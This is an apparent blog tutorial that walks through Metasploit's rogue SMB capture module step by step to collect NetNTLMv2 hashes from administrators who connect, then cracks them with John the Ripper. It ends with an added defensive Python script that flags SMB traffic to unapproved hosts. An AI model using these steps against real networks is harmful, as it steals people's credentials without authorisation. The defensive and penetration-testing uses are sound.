How to Set Up a Rogue (Fake) SMB Server to capture credentials

by hash3liZer . 21 December 2018

SMB (Server Message Block) is a protocol for sharing files, printers and other resources among computers. Over the history of SMB, various flaws, including RCE, have been identified in earlier versions. It follows a client-server (request-response) model and is widely deployed in local networks, small offices and similar environments.

Metasploit provides an auxiliary module for hosting a fake SMB server, which captures a user's credentials when a request is sent to the server. This makes exploiting Samba easier, depending on whether you have the capacity to wait for your target to perform the malicious action.

Think of a case where you are on a local network and the administrator tries to access your computer through Samba using their credentials. The password hash can be acquired by setting up a fake SMB server, much as with social media phishing and a rogue access point.

STEP 1

Metasploit

Metasploit uses a PostgreSQL database for its storage service and is heavily dependent on it. By default, most systems keep PostgreSQL stopped. So, start the postgresql service:

$ systemctl start postgresql
$ systemctl enable postgresql

The second command enables the postgresql service to start at boot time, so there's no need to repeat this step. Now, start the Metasploit console:

$ msfconsole

STEP 2

Options

To set up the server, we need the appropriate auxiliary module. Metasploit provides a lot of modules, and you can search for one with the search command. However, let's stick to the task for now. Select the fake SMB service module:

use auxiliary/server/capture/smb

There are some other fake services available as well, located under the directory: auxiliary/server/capture/

Let's look at the available options:

show options

Among the options are JOHNPWFILE and CAINPWFILE. The server outputs the credentials in hashed form, which must be cracked later. JOHNPWFILE sets the hash file for John the Ripper, and CAINPWFILE sets the hash file for Cain and Abel. Since I am using Linux, I'll go with the John file. You can choose accordingly.

set JOHNPWFILE /home/hash3lizer/Desktop/smbhash

STEP 3

Exploit

I'll leave the other options as they are. Finally, run the fake service:

run

Now, let's turn to the victim side. Suppose an administrator, believing he can authenticate with the server, uses the allotted credentials, but in fact it's a fake server. Share your IP on the network, and when you get a connection from another user, the module will show the captured hash, and the password will be stored in hashed form in the file.

Acting as another user, I would run the command:

$ smbclient -L [IP here]

STEP 4

Crack the Password

Now, if you come back to the Metasploit terminal, it will say that a hash was captured!

Let's pass it to John the Ripper. The module appends a suffix for the hash type to the JOHNPWFILE name, which is why the file below ends in _netntlmv2. Depending on the complexity of the password, John the Ripper will try to crack it. This would take days to months depending on its complexity and randomness.

$ john /home/hash3lizer/Desktop/smbhash_netntlmv2

Conclusion

We can capture SMB credentials by hosting a rogue SMB server on localhost, and Metasploit makes that easy for us. The captured hash can later be cracked using John the Ripper or Cain & Abel. This gives a quick demonstration of how easy it is to acquire credentials by getting users to perform malicious tasks.
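
From the defender's side, the connection made in STEP 3 shows up as an SMB session to a host that is not a sanctioned file server. The following is an added example, not part of the original post, that flags such connections in flow records. The record format, the addresses and the allowlist are all constructed for illustration.

```python
import ipaddress

# Assumption: sanctioned SMB servers on this network (constructed addresses).
APPROVED_SMB_SERVERS = {"10.0.0.10", "10.0.0.11"}
SMB_PORTS = {139, 445}

# Constructed flow records: "timestamp src_ip dst_ip dst_port proto"
SAMPLE_FLOWS = """\
2018-12-21T09:14:02 10.0.0.57 10.0.0.10 445 tcp
2018-12-21T09:15:40 10.0.0.23 10.0.0.99 445 tcp
2018-12-21T09:15:41 10.0.0.23 10.0.0.99 445 tcp
2018-12-21T09:16:05 10.0.0.57 10.0.0.11 139 tcp
2018-12-21T09:20:13 10.0.0.31 10.0.0.99 139 tcp
2018-12-21T09:21:00 10.0.0.31 10.0.0.5 443 tcp
malformed line
"""

def parse_flow(line):
    """Return (ts, src, dst, port), or None for lines that do not parse."""
    parts = line.split()
    if len(parts) != 5 or parts[4].lower() != "tcp":
        return None
    ts, src, dst, port, _ = parts
    try:
        ipaddress.ip_address(src)
        ipaddress.ip_address(dst)
        return ts, src, dst, int(port)
    except ValueError:
        return None

def unapproved_smb(flows_text, approved=APPROVED_SMB_SERVERS):
    """Map each unapproved SMB destination to the set of clients that reached it."""
    hits = {}
    for line in flows_text.splitlines():
        rec = parse_flow(line)
        if rec is None:
            continue  # skip malformed or non-TCP records
        _, src, dst, port = rec
        if port in SMB_PORTS and dst not in approved:
            hits.setdefault(dst, set()).add(src)
    return hits

if __name__ == "__main__":
    for dst, clients in sorted(unapproved_smb(SAMPLE_FLOWS).items()):
        print(f"SMB to unapproved host {dst} from: {', '.join(sorted(clients))}")
```

Any client listed against an unapproved host may have sent an authentication attempt there, so its account password is a candidate for rotation.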